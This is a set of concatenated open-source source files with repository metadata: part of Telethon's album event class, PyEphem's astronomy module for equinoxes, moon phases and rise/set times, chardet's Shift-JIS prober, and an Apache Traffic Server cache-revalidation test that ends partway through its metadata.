async def forward_to(self, *args, **kwargs):
"""
Forwards the entire album. Shorthand for
`telethon.client.messages.MessageMethods.forward_messages`
with both ``messages`` and ``from_peer`` already set.
"""
if self._client:
kwargs['messages'] = self.messages
kwargs['as_album'] = True
kwargs['from_peer'] = await self.get_input_chat()
return await self._client.forward_messages(*args, **kwargs)
async def edit(self, *args, **kwargs):
"""
Edits the first caption or the message, or the first messages'
caption if no caption is set, iff it's outgoing. Shorthand for
`telethon.client.messages.MessageMethods.edit_message`
with both ``entity`` and ``message`` already set.
Returns `None` if the message was incoming,
or the edited `Message` otherwise.
.. note::
This is different from `client.edit_message
<telethon.client.messages.MessageMethods.edit_message>`
and **will respect** the previous state of the message.
For example, if the message didn't have a link preview,
the edit won't add one by default, and you should force
it by setting it to `True` if you want it.
This is generally the most desired and convenient behaviour,
and will work for link previews and message buttons.
"""
for msg in self.messages:
if msg.raw_text:
return await msg.edit(*args, **kwargs)
return await self.messages[0].edit(*args, **kwargs)
async def delete(self, *args, **kwargs):
"""
Deletes the entire album. You're responsible for checking whether
you have the permission to do so, or to except the error otherwise.
Shorthand for
`telethon.client.messages.MessageMethods.delete_messages` with
``entity`` and ``message_ids`` already set.
"""
if self._client:
return await self._client.delete_messages(
await self.get_input_chat(), self.messages,
*args, **kwargs
)
async def mark_read(self):
"""
Marks the entire album as read. Shorthand for
`client.send_read_acknowledge()
<telethon.client.messages.MessageMethods.send_read_acknowledge>`
with both ``entity`` and ``message`` already set.
"""
if self._client:
await self._client.send_read_acknowledge(
await self.get_input_chat(), max_id=self.messages[-1].id)
async def pin(self, *, notify=False):
"""
Pins the first photo in the album. Shorthand for
`telethon.client.messages.MessageMethods.pin_message`
with both ``entity`` and ``message`` already set.
"""
await self.messages[0].pin(notify=notify)
def __len__(self):
"""
Return the amount of messages in the album.
Equivalent to ``len(self.messages)``.
"""
return len(self.messages)
def __iter__(self):
"""
Iterate over the messages in the album.
Equivalent to ``iter(self.messages)``.
"""
return iter(self.messages)
def __getitem__(self, n):
"""
Access the n'th message in the album.
Equivalent to ``event.messages[n]``.
"""
return self.messages[n]
| {
"content_hash": "0f0066c8c6f8a94a7d62cdf2fd40bb10",
"timestamp": "",
"source": "github",
"line_count": 286,
"max_line_length": 91,
"avg_line_length": 37.43356643356643,
"alnum_prop": 0.5535213898748366,
"repo_name": "expectocode/Telethon",
"id": "2ba1e61b0d6c5857a50dc344aac58e1719834f23",
"size": "10706",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "telethon/events/album.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "776"
},
{
"name": "Makefile",
"bytes": "605"
},
{
"name": "Python",
"bytes": "443578"
}
],
"symlink_target": ""
} |
import ephem._libastro as _libastro
from math import pi
__version__ = '3.7.5.1'
twopi = pi * 2.
halfpi = pi / 2.
quarterpi = pi / 4.
eighthpi = pi / 8.
degree = twopi / 360.
arcminute = degree / 60.
arcsecond = arcminute / 60.
half_arcsecond = arcsecond / 2.
tiny = arcsecond / 360.
c = 299792458. # exact speed of light in meters/second
meters_per_au = _libastro.meters_per_au
earth_radius = _libastro.earth_radius
moon_radius = _libastro.moon_radius
sun_radius = _libastro.sun_radius
B1900 = 2415020.3135 - _libastro.MJD0
B1950 = 2433282.4235 - _libastro.MJD0
J2000 = _libastro.J2000
# We make available several basic types from _libastro.
Angle = _libastro.Angle
degrees = _libastro.degrees
hours = _libastro.hours
Date = _libastro.Date
hour = 1. / 24.
minute = hour / 60.
second = minute / 60.
default_newton_precision = second / 10.
delta_t = _libastro.delta_t
julian_date = _libastro.julian_date
Body = _libastro.Body
Planet = _libastro.Planet
PlanetMoon = _libastro.PlanetMoon
FixedBody = _libastro.FixedBody
EllipticalBody = _libastro.EllipticalBody
ParabolicBody = _libastro.ParabolicBody
HyperbolicBody = _libastro.HyperbolicBody
EarthSatellite = _libastro.EarthSatellite
readdb = _libastro.readdb
readtle = _libastro.readtle
constellation = _libastro.constellation
separation = _libastro.separation
now = _libastro.now
millennium_atlas = _libastro.millennium_atlas
uranometria = _libastro.uranometria
uranometria2000 = _libastro.uranometria2000
# We also create a Python class ("Mercury", "Venus", etcetera) for
# each planet and moon for which _libastro offers specific algorithms.
for index, classname, name in _libastro.builtin_planets():
exec '''
class %s(_libastro.%s):
__planet__ = %r
''' % (name, classname, index)
del index, classname, name
# We now replace two of the classes we have just created, because
# _libastro actually provides separate types for two of the bodies.
Jupiter = _libastro.Jupiter
Saturn = _libastro.Saturn
Moon = _libastro.Moon
# Newton's method.
def newton(f, x0, x1, precision=default_newton_precision):
"""Return an x-value at which the given function reaches zero.
Stops and declares victory once the x-value is within ``precision``
of the solution, which defaults to a half-second of clock time.
"""
f0, f1 = f(x0), f(x1)
while f1 and abs(x1 - x0) > precision and f1 != f0:
x0, x1 = x1, x1 + (x1 - x0) / (f0/f1 - 1)
f0, f1 = f1, f(x1)
return x1
# Find equinoxes and solstices.
_sun = Sun() # used for computing equinoxes
def holiday(d0, motion, offset):
"""Function that assists the finding of equinoxes and solstices."""
def f(d):
_sun.compute(d)
return (_sun.ra + eighthpi) % quarterpi - eighthpi
d0 = Date(d0)
_sun.compute(d0)
angle_to_cover = motion - (_sun.ra + offset) % motion
if abs(angle_to_cover) < tiny:
angle_to_cover = motion
d = d0 + 365.25 * angle_to_cover / twopi
return date(newton(f, d, d + hour))
def previous_vernal_equinox(date):
"""Return the date of the previous vernal equinox."""
return holiday(date, -twopi, 0)
def next_vernal_equinox(date):
"""Return the date of the next vernal equinox."""
return holiday(date, twopi, 0)
def previous_summer_solstice(date):
"""Return the date of the previous summer solstice."""
return holiday(date, -twopi, pi + halfpi)
def next_summer_solstice(date):
"""Return the date of the next summer solstice."""
return holiday(date, twopi, pi + halfpi)
def previous_autumnal_equinox(date):
"""Return the date of the previous autumnal equinox."""
return holiday(date, -twopi, pi)
def next_autumnal_equinox(date):
"""Return the date of the next autumnal equinox."""
return holiday(date, twopi, pi)
def previous_winter_solstice(date):
"""Return the date of the previous winter solstice."""
return holiday(date, -twopi, halfpi)
def next_winter_solstice(date):
"""Return the date of the next winter solstice."""
return holiday(date, twopi, halfpi)
# Common synonyms.
next_spring_equinox = next_vernal_equinox
previous_spring_equinox = previous_vernal_equinox
next_fall_equinox = next_autumn_equinox = next_autumnal_equinox
previous_fall_equinox = previous_autumn_equinox = previous_autumnal_equinox
# More-general functions that find any equinox or solstice.
def previous_equinox(date):
"""Return the date of the previous equinox."""
return holiday(date, -pi, 0)
def next_equinox(date):
"""Return the date of the next equinox."""
return holiday(date, pi, 0)
def previous_solstice(date):
"""Return the date of the previous solstice."""
return holiday(date, -pi, halfpi)
def next_solstice(date):
"""Return the date of the next solstice."""
return holiday(date, pi, halfpi)
# Find phases of the Moon.
_moon = Moon() # used for computing Moon phases
def _find_moon_phase(d0, motion, target):
"""Function that assists the finding of moon phases."""
def f(d):
_sun.compute(d)
_moon.compute(d)
slon = _libastro.eq_ecl(d, _sun.g_ra, _sun.g_dec)[0]
mlon = _libastro.eq_ecl(d, _moon.g_ra, _moon.g_dec)[0]
return (mlon - slon - antitarget) % twopi - pi
antitarget = target + pi
d0 = Date(d0)
f0 = f(d0)
angle_to_cover = (- f0) % motion
if abs(angle_to_cover) < tiny:
angle_to_cover = motion
d = d0 + 29.53 * angle_to_cover / twopi
return date(newton(f, d, d + hour))
def previous_new_moon(date):
"""Return the date of the previous New Moon."""
return _find_moon_phase(date, -twopi, 0)
def next_new_moon(date):
"""Return the date of the next New Moon."""
return _find_moon_phase(date, twopi, 0)
def previous_first_quarter_moon(date):
"""Return the date of the previous First Quarter Moon."""
return _find_moon_phase(date, -twopi, halfpi)
def next_first_quarter_moon(date):
"""Return the date of the next First Quarter Moon."""
return _find_moon_phase(date, twopi, halfpi)
def previous_full_moon(date):
"""Return the date of the previous Full Moon."""
return _find_moon_phase(date, -twopi, pi)
def next_full_moon(date):
"""Return the date of the next Full Moon."""
return _find_moon_phase(date, twopi, pi)
def previous_last_quarter_moon(date):
"""Return the date of the previous Last Quarter Moon."""
return _find_moon_phase(date, -twopi, pi + halfpi)
def next_last_quarter_moon(date):
"""Return the date of the next Last Quarter Moon."""
return _find_moon_phase(date, twopi, pi + halfpi)
# We provide a Python extension to our _libastro "Observer" class that
# can search for circumstances like transits.
class CircumpolarError(ValueError): pass
class NeverUpError(CircumpolarError): pass
class AlwaysUpError(CircumpolarError): pass
class Observer(_libastro.Observer):
__slots__ = [ 'name' ]
elev = _libastro.Observer.elevation
def __repr__(self):
"""Return a useful textual representation of this Observer."""
return ('<ephem.Observer date=%r epoch=%r'
' lon=%s lat=%s elevation=%sm'
' horizon=%s temp=%sC pressure=%smBar>'
% (str(self.date), str(self.epoch),
self.lon, self.lat, self.elevation,
self.horizon, self.temp, self.pressure))
def compute_pressure(self):
"""Set the atmospheric pressure for the current elevation."""
# Formula from the ISA Standard Atmosphere
self.pressure = (1013.25 * (1 - 0.0065 * self.elevation / 288.15)
** 5.2558761132785179)
def _compute_transit(self, body, start, sign, offset):
"""Internal function used to compute transits."""
if isinstance(body, EarthSatellite):
raise TypeError(
'the next and previous transit methods do not'
' support earth satellites because of their speed;'
' please use the higher-resolution next_pass() method'
)
def f(d):
self.date = d
body.compute(self)
return degrees(offset - sidereal_time() + body.g_ra).znorm
if start is not None:
self.date = start
sidereal_time = self.sidereal_time
body.compute(self)
ha = sidereal_time() - body.g_ra
ha_to_move = (offset - ha) % (sign * twopi)
if abs(ha_to_move) < tiny:
ha_to_move = sign * twopi
d = self.date + ha_to_move / twopi
result = Date(newton(f, d, d + minute))
return result
def _previous_transit(self, body, start=None):
"""Find the previous passage of a body across the meridian."""
return self._compute_transit(body, start, -1., 0.)
def _next_transit(self, body, start=None):
"""Find the next passage of a body across the meridian."""
return self._compute_transit(body, start, +1., 0.)
def _previous_antitransit(self, body, start=None):
"""Find the previous passage of a body across the anti-meridian."""
return self._compute_transit(body, start, -1., pi)
def _next_antitransit(self, body, start=None):
"""Find the next passage of a body across the anti-meridian."""
return self._compute_transit(body, start, +1., pi)
def previous_transit(self, body, start=None):
"""Find the previous passage of a body across the meridian."""
original_date = self.date
d = self._previous_transit(body, start)
self.date = original_date
return d
def next_transit(self, body, start=None):
"""Find the next passage of a body across the meridian."""
original_date = self.date
d = self._next_transit(body, start)
self.date = original_date
return d
def previous_antitransit(self, body, start=None):
"""Find the previous passage of a body across the anti-meridian."""
original_date = self.date
d = self._previous_antitransit(body, start)
self.date = original_date
return d
def next_antitransit(self, body, start=None):
"""Find the next passage of a body across the anti-meridian."""
original_date = self.date
d = self._next_antitransit(body, start)
self.date = original_date
return d
def disallow_circumpolar(self, declination):
"""Raise an exception if the given declination is circumpolar.
Raises NeverUpError if an object at the given declination is
always below this Observer's horizon, or AlwaysUpError if such
an object would always be above the horizon.
"""
if abs(self.lat - declination) >= halfpi:
raise NeverUpError('The declination %s never rises'
' above the horizon at latitude %s'
% (declination, self.lat))
if abs(self.lat + declination) >= halfpi:
raise AlwaysUpError('The declination %s is always'
' above the horizon at latitude %s'
% (declination, self.lat))
def _riset_helper(self, body, start, use_center, rising, previous):
"""Internal function for finding risings and settings."""
if isinstance(body, EarthSatellite):
raise TypeError(
'the rising and settings methods do not'
' support earth satellites because of their speed;'
' please use the higher-resolution next_pass() method'
)
def visit_transit():
d = (previous and self._previous_transit(body)
or self._next_transit(body)) # if-then
if body.alt + body.radius * use_radius - self.horizon <= 0:
raise NeverUpError('%r transits below the horizon at %s'
% (body.name, d))
return d
def visit_antitransit():
d = (previous and self._previous_antitransit(body)
or self._next_antitransit(body)) # if-then
if body.alt + body.radius * use_radius - self.horizon >= 0:
raise AlwaysUpError('%r is still above the horizon at %s'
% (body.name, d))
return d
# Determine whether we should offset the result for the radius
# of the object being measured, or instead pretend that rising
# and setting happens when its center crosses the horizon.
if use_center:
use_radius = 0.0
else:
use_radius = 1.0
# Save self.date so that we can restore it before returning.
original_date = self.date
# Start slightly to one side of the start date, to prevent
# repeated calls from returning the same solution over and over.
if start is not None:
self.date = start
if previous:
self.date -= default_newton_precision
else:
self.date += default_newton_precision
# Take a big leap towards the solution, then Newton takes us home.
body.compute(self)
heading_downward = (rising == previous) # "==" is inverted "xor"
if heading_downward:
on_lower_cusp = (body.alt + body.radius * use_radius
- self.horizon > tiny)
else:
on_lower_cusp = (body.alt + body.radius * use_radius
- self.horizon < - tiny)
az = body.az
on_right_side_of_sky = ((rising == (az < pi)) # inverted "xor"
or (az < tiny
or pi - tiny < az < pi + tiny
or twopi - tiny < az))
if on_lower_cusp and on_right_side_of_sky:
d0 = self.date
elif heading_downward:
d0 = visit_transit()
else:
d0 = visit_antitransit()
if heading_downward:
d1 = visit_antitransit()
else:
d1 = visit_transit()
def f(d):
self.date = d
body.compute(self)
return body.alt + body.radius * use_radius - self.horizon
d = (d0 + d1) / 2.
result = Date(newton(f, d, d + minute))
self.date = original_date
return result
def previous_rising(self, body, start=None, use_center=False):
"""Move to the given body's previous rising, returning the date."""
return self._riset_helper(body, start, use_center, True, True)
def previous_setting(self, body, start=None, use_center=False):
"""Move to the given body's previous setting, returning the date."""
return self._riset_helper(body, start, use_center, False, True)
def next_rising(self, body, start=None, use_center=False):
"""Move to the given body's next rising, returning the date."""
return self._riset_helper(body, start, use_center, True, False)
def next_setting(self, body, start=None, use_center=False):
"""Move to the given body's next setting, returning the date."""
return self._riset_helper(body, start, use_center, False, False)
def next_pass(self, body):
"""Return the next rising, culmination, and setting of a satellite."""
if not isinstance(body, EarthSatellite):
raise TypeError(
'the next_pass() method is only for use with'
' EarthSatellite objects because of their high speed'
)
return _libastro._next_pass(self, body)
# Time conversion.
def localtime(date):
"""Convert a PyEphem date into local time, returning a Python datetime."""
import calendar, time, datetime
timetuple = time.localtime(calendar.timegm(date.tuple()))
return datetime.datetime(*timetuple[:7])
# Coordinate transformations.
class Coordinate(object):
def __init__(self, *args, **kw):
# Accept an optional "epoch" keyword argument.
epoch = kw.pop('epoch', None)
if epoch is not None:
self.epoch = epoch = Date(epoch)
if kw:
raise TypeError('"epoch" is the only keyword argument'
' you can use during %s instantiation'
% (type(self).__name__))
# Interpret a single-argument initialization.
if len(args) == 1:
a = args[0]
if isinstance(a, Body):
a = Equatorial(a.a_ra, a.a_dec, epoch = a.a_epoch)
for cls in (Equatorial, Ecliptic, Galactic):
if isinstance(a, cls):
# If the user omitted an "epoch" keyword, then
# use the epoch of the other object.
if epoch is None:
self.epoch = epoch = a.epoch
# If we are initialized from another of the same
# kind of coordinate and epoch, simply copy the
# coordinates and epoch into this new object.
if isinstance(self, cls) and epoch == a.epoch:
self.set(*a.get())
return
# Otherwise, convert.
ra, dec = a.to_radec()
if epoch != a.epoch:
ra, dec = _libastro.precess(
a.epoch, epoch, ra, dec
)
self.from_radec(ra, dec)
return
raise TypeError(
'a single argument used to initialize %s() must be either'
' a coordinate or a Body, not an %r' % (type(a).__name__,)
)
# Two arguments are interpreted as (ra, dec) or (lon, lat).
elif len(args) == 2:
self.set(*args)
if epoch is None:
self.epoch = epoch = Date('2000')
else:
raise TypeError(
'to initialize %s you must pass either a Body,'
' another coordinate, or two coordinate values,'
' but not: %r' % (type(self).__name__, args,)
)
class Equatorial(Coordinate):
def get(self):
return self.ra, self.dec
def set(self, ra, dec):
self.ra, self.dec = hours(ra), degrees(dec)
to_radec = get
from_radec = set
class LonLatCoordinate(Coordinate):
def set(self, lon, lat):
self.lon, self.lat = degrees(lon), degrees(lat)
def get(self):
return self.lon, self.lat
class Ecliptic(LonLatCoordinate):
def to_radec(self):
return _libastro.ecl_eq(self.epoch, self.lon, self.lat)
def from_radec(self, ra, dec):
self.lon, self.lat = _libastro.eq_ecl(self.epoch, ra, dec)
class Galactic(LonLatCoordinate):
def to_radec(self):
return _libastro.gal_eq(self.epoch, self.lon, self.lat)
def from_radec(self, ra, dec):
self.lon, self.lat = _libastro.eq_gal(self.epoch, ra, dec)
# For backwards compatibility, provide lower-case names for our Date
# and Angle classes, and also allow "Lon" to be spelled "Long".
date = Date
angle = Angle
LongLatCoordinate = LonLatCoordinate
# Catalog boostraps. Each of these functions imports a catalog
# module, then replaces itself with the function of the same name that
# lives inside of the catalog.
def star(name, *args, **kwargs):
"""Load the stars database and return a star."""
global star
import ephem.stars
star = ephem.stars.star
return star(name, *args, **kwargs)
def city(name):
"""Load the cities database and return a city."""
global city
import ephem.cities
city = ephem.cities.city
return city(name)
| {
"content_hash": "5c302604d3788d0427a7c9968338308b",
"timestamp": "",
"source": "github",
"line_count": 589,
"max_line_length": 78,
"avg_line_length": 33.62308998302207,
"alnum_prop": 0.6040698848717431,
"repo_name": "bennettscience/PySky",
"id": "d26722004691de81b465af53192eff2411c54d4d",
"size": "19964",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pyephem-3.7.5.1/build/lib.macosx-10.8-intel-2.7/ephem/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1350"
}
],
"symlink_target": ""
} |
from .chardistribution import SJISDistributionAnalysis
from .codingstatemachine import CodingStateMachine
from .enums import MachineState, ProbingState
from .jpcntx import SJISContextAnalysis
from .mbcharsetprober import MultiByteCharSetProber
from .mbcssm import SJIS_SM_MODEL
class SJISProber(MultiByteCharSetProber):
def __init__(self):
super().__init__()
self.coding_sm = CodingStateMachine(SJIS_SM_MODEL)
self.distribution_analyzer = SJISDistributionAnalysis()
self.context_analyzer = SJISContextAnalysis()
self.reset()
def reset(self):
super().reset()
self.context_analyzer.reset()
@property
def charset_name(self):
return self.context_analyzer.charset_name
@property
def language(self):
return "Japanese"
def feed(self, byte_str):
for i, byte in enumerate(byte_str):
coding_state = self.coding_sm.next_state(byte)
if coding_state == MachineState.ERROR:
self.logger.debug(
"%s %s prober hit error at byte %s",
self.charset_name,
self.language,
i,
)
self._state = ProbingState.NOT_ME
break
if coding_state == MachineState.ITS_ME:
self._state = ProbingState.FOUND_IT
break
if coding_state == MachineState.START:
char_len = self.coding_sm.get_current_charlen()
if i == 0:
self._last_char[1] = byte
self.context_analyzer.feed(
self._last_char[2 - char_len :], char_len
)
self.distribution_analyzer.feed(self._last_char, char_len)
else:
self.context_analyzer.feed(
byte_str[i + 1 - char_len : i + 3 - char_len], char_len
)
self.distribution_analyzer.feed(byte_str[i - 1 : i + 1], char_len)
self._last_char[0] = byte_str[-1]
if self.state == ProbingState.DETECTING:
if self.context_analyzer.got_enough_data() and (
self.get_confidence() > self.SHORTCUT_THRESHOLD
):
self._state = ProbingState.FOUND_IT
return self.state
def get_confidence(self):
context_conf = self.context_analyzer.get_confidence()
distrib_conf = self.distribution_analyzer.get_confidence()
return max(context_conf, distrib_conf)
| {
"content_hash": "958af939fd40f0b9fa11d4521253c9f5",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 86,
"avg_line_length": 36.394366197183096,
"alnum_prop": 0.5626934984520123,
"repo_name": "pfmoore/pip",
"id": "3bcbdb71d1639b5cac8ff9c4461e1e36f6f4bb17",
"size": "3749",
"binary": false,
"copies": "4",
"ref": "refs/heads/main",
"path": "src/pip/_vendor/chardet/sjisprober.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "3137"
},
{
"name": "PowerShell",
"bytes": "2137"
},
{
"name": "Python",
"bytes": "7138085"
}
],
"symlink_target": ""
} |
'''
Test cached responses and requests with bodies
'''
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import time
Test.Summary = '''
Test revalidating cached objects
'''
testName = "RevalidateCacheObject"
# Needs Curl
Test.SkipUnless(
Condition.HasProgram("curl", "curl needs to be installed on system for this test to work"),
)
Test.ContinueOnFail = True
# Set up Origin server
# request_header is from ATS to origin; response from Origin to ATS
# lookup_key is to make unique response in origin for header "UID" that will pass in ATS request
server = Test.MakeOriginServer("server",lookup_key="{%UID}")
# Initial request
request_header = {"headers": "GET / HTTP/1.1\r\nHost: www.example.com\r\nUID: Fill\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
response_header = {"headers": "HTTP/1.1 200 OK\r\nConnection: close\r\nLast-Modified: Tue, 08 May 2018 15:49:41 GMT\r\nCache-Control: max-age=1\r\n\r\n", "timestamp": "1469733493.993", "body": "xxx"}
server.addResponse("sessionlog.json", request_header, response_header)
# IMS revalidation request
request_IMS_header = {"headers": "GET / HTTP/1.1\r\nUID: IMS\r\nIf-Modified-Since: Tue, 08 May 2018 15:49:41 GMT\r\nHost: www.example.com\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
response_IMS_header = {"headers": "HTTP/1.1 304 Not Modified\r\nConnection: close\r\nCache-Control: max-age=1\r\n\r\n", "timestamp": "1469733493.993", "body": None}
server.addResponse("sessionlog.json", request_IMS_header, response_IMS_header)
# EtagFill
request_etagfill_header = {"headers": "GET /etag HTTP/1.1\r\nHost: www.example.com\r\nUID: EtagFill\r\n\r\n", "timestamp": "1469733493.993", "body": None}
response_etagfill_header = {"headers": "HTTP/1.1 200 OK\r\nETag: myetag\r\nConnection: close\r\nCache-Control: max-age=1\r\n\r\n", "timestamp": "1469733493.993", "body": "xxx"}
server.addResponse("sessionlog.json", request_etagfill_header, response_etagfill_header)
# INM revalidation
request_INM_header = {"headers": "GET /etag HTTP/1.1\r\nUID: INM\r\nIf-None-Match: myetag\r\nHost: www.example.com\r\n\r\n", "timestamp": "1469733493.993", "body": None}
response_INM_header = {"headers": "HTTP/1.1 304 Not Modified\r\nConnection: close\r\nETag: myetag\r\nCache-Control: max-age=1\r\n\r\n", "timestamp": "1469733493.993", "body": None}
server.addResponse("sessionlog.json", request_INM_header, response_INM_header)
# object changed to 0 byte
request_noBody_header = {"headers": "GET / HTTP/1.1\r\nUID: noBody\r\nHost: www.example.com\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
response_noBody_header = {"headers": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 0\r\nCache-Control: max-age=3\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
server.addResponse("sessionlog.json", request_noBody_header, response_noBody_header)
# etag object now is a 404. Yeah, 404s don't usually have Cache-Control, but, ATS's default is to cache 404s for a while.
request_etagfill_header = {"headers": "GET /etag HTTP/1.1\r\nHost: www.example.com\r\nUID: EtagError\r\n\r\n", "timestamp": "1469733493.993", "body": None}
response_etagfill_header = {"headers": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nContent-Length: 0\r\nCache-Control: max-age=3\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
server.addResponse("sessionlog.json", request_etagfill_header, response_etagfill_header)
# ATS Configuration
ts = Test.MakeATSProcess("ts", select_ports=False)
ts.Disk.plugin_config.AddLine('xdebug.so')
ts.Disk.records_config.update({
'proxy.config.diags.debug.enabled': 1,
'proxy.config.diags.debug.tags': 'http',
'proxy.config.http.response_via_str': 3,
'proxy.config.http.cache.http': 1,
'proxy.config.http.wait_for_cache': 1,
})
ts.Disk.remap_config.AddLine(
'map / http://127.0.0.1:{0}'.format(server.Variables.Port)
)
# Test 0 - Fill a 3 byte object with Last-Modified time into cache.
tr = Test.AddTestRun()
tr.Processes.Default.StartBefore(server)
tr.Processes.Default.StartBefore(ts, ready=1)
tr.Processes.Default.Command = 'curl -s -D - -v --ipv4 --http1.1 -H"UID: Fill" -H "x-debug: x-cache,x-cache-key,via" -H "Host: www.example.com" http://localhost:{0}/'.format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = "cache_and_req_body-miss.gold"
tr.StillRunningAfter = ts
tr.StillRunningAfter = server
# Test 1 - Once it goes stale, fetch it again. We expect Origin to get IMS request, and serve a 304. We expect ATS to refresh the object, and give a 200 to user
tr = Test.AddTestRun()
tr.DelayStart=2
tr.Processes.Default.Command = 'curl -s -D - -v --ipv4 --http1.1 -H"UID: IMS" -H "x-debug: x-cache,x-cache-key,via" -H "Host: www.example.com" http://localhost:{0}/'.format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = "cache_and_req_body-hit-stale.gold"
tr.StillRunningAfter = ts
tr.StillRunningAfter = server
# Test 2 - Once it goes stale, fetch it via a range request. We expect Origin to get IMS request, and serve a 304. We expect ATS to refresh the object, and give a 206 to user
tr = Test.AddTestRun()
tr.DelayStart=2
tr.Processes.Default.Command = 'curl --range 0-1 -s -D - -v --ipv4 --http1.1 -H"UID: IMS" -H "x-debug: x-cache,x-cache-key,via" -H "Host: www.example.com" http://localhost:{0}/'.format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = "cache_and_req_body-hit-stale-206.gold"
tr.StillRunningAfter = ts
tr.StillRunningAfter = server
# Test 3 - Fill a new object with an Etag. Not checking the output here.
tr = Test.AddTestRun()
tr.Processes.Default.Command = 'curl -s -D - -v --ipv4 --http1.1 -H"UID: EtagFill" -H "x-debug: x-cache,x-cache-key,via" -H "Host: www.example.com" http://localhost:{0}/etag'.format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = ts
tr.StillRunningAfter = server
# Test 4 - Once the etag object goes stale, fetch it again. We expect Origin to get INM request, and serve a 304. We expect ATS to refresh the object, and give a 200 to user
tr = Test.AddTestRun()
tr.DelayStart=2
tr.Processes.Default.Command = 'curl -s -D - -v --ipv4 --http1.1 -H"UID: INM" -H "x-debug: x-cache,x-cache-key,via" -H "Host: www.example.com" http://localhost:{0}/etag'.format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = "cache_and_req_body-hit-stale-INM.gold"
tr.StillRunningAfter = ts
tr.StillRunningAfter = server
# Test 5 - Once the etag object goes stale, fetch it via a range request. We expect Origin to get INM request, and serve a 304. We expect ATS to refresh the object, and give a 206 to user
tr = Test.AddTestRun()
tr.DelayStart=2
tr.Processes.Default.Command = 'curl --range 0-1 -s -D - -v --ipv4 --http1.1 -H"UID: INM" -H "x-debug: x-cache,x-cache-key,via" -H "Host: www.example.com" http://localhost:{0}/etag'.format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = "cache_and_req_body-hit-stale-206-etag.gold"
tr.StillRunningAfter = ts
tr.StillRunningAfter = server
# Test 6 - The origin changes the initial LMT object to 0 byte. We expect ATS to fetch and serve the new 0 byte object.
tr = Test.AddTestRun()
tr.DelayStart=3
tr.Processes.Default.Command = 'curl -s -D - -v --ipv4 --http1.1 -H"UID: noBody" -H "x-debug: x-cache,x-cache-key,via" -H "Host: www.example.com" http://localhost:{0}/'.format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = "cache_and_req_nobody-hit-stale.gold"
tr.StillRunningAfter = ts
tr.StillRunningAfter = server
# Test 7 - Fetch the new 0 byte object again when fresh in cache to ensure its still a 0 byte object.
tr = Test.AddTestRun()
tr.DelayStart=3
tr.Processes.Default.Command = 'curl -s -D - -v --ipv4 --http1.1 -H"UID: noBody" -H "x-debug: x-cache,x-cache-key,via" -H "Host: www.example.com" http://localhost:{0}/'.format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = "cache_and_req_nobody-hit-stale.gold"
tr.StillRunningAfter = ts
tr.StillRunningAfter = server
# Test 8 - The origin changes the etag object to 0 byte 404. We expect ATS to fetch and serve the 404 0 byte object.
tr = Test.AddTestRun()
tr.DelayStart=2
tr.Processes.Default.Command = 'curl -s -D - -v --ipv4 --http1.1 -H"UID: EtagError" -H "x-debug: x-cache,x-cache-key,via" -H "Host: www.example.com" http://localhost:{0}/etag'.format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = "cache_and_error_nobody.gold"
tr.StillRunningAfter = ts
tr.StillRunningAfter = server
# Test 9 - Fetch the 0 byte etag object again when fresh in cache to ensure its still a 0 byte object
tr = Test.AddTestRun()
tr.DelayStart=2
tr.Processes.Default.Command = 'curl -s -D - -v --ipv4 --http1.1 -H"UID: EtagError" -H "x-debug: x-cache,x-cache-key,via" -H "Host: www.example.com" http://localhost:{0}/etag'.format(ts.Variables.port)
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.Streams.stdout = "cache_and_error_nobody.gold"
tr.StillRunningAfter = ts
tr.StillRunningAfter = server
| {
"content_hash": "4810ceb54dc7b066c005b17479111068",
"timestamp": "",
"source": "github",
"line_count": 168,
"max_line_length": 207,
"avg_line_length": 58.958333333333336,
"alnum_prop": 0.7287228672387683,
"repo_name": "chitianhao/trafficserver",
"id": "a8dabae52aa9e5539cd014a53ceb143c2ed460d6",
"size": "9905",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/gold_tests/headers/cachedIMSRange.test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "1481933"
},
{
"name": "C++",
"bytes": "12818807"
},
{
"name": "CMake",
"bytes": "18505"
},
{
"name": "Dockerfile",
"bytes": "3283"
},
{
"name": "Java",
"bytes": "9881"
},
{
"name": "JavaScript",
"bytes": "1609"
},
{
"name": "Lex",
"bytes": "4029"
},
{
"name": "Lua",
"bytes": "39258"
},
{
"name": "M4",
"bytes": "187086"
},
{
"name": "Makefile",
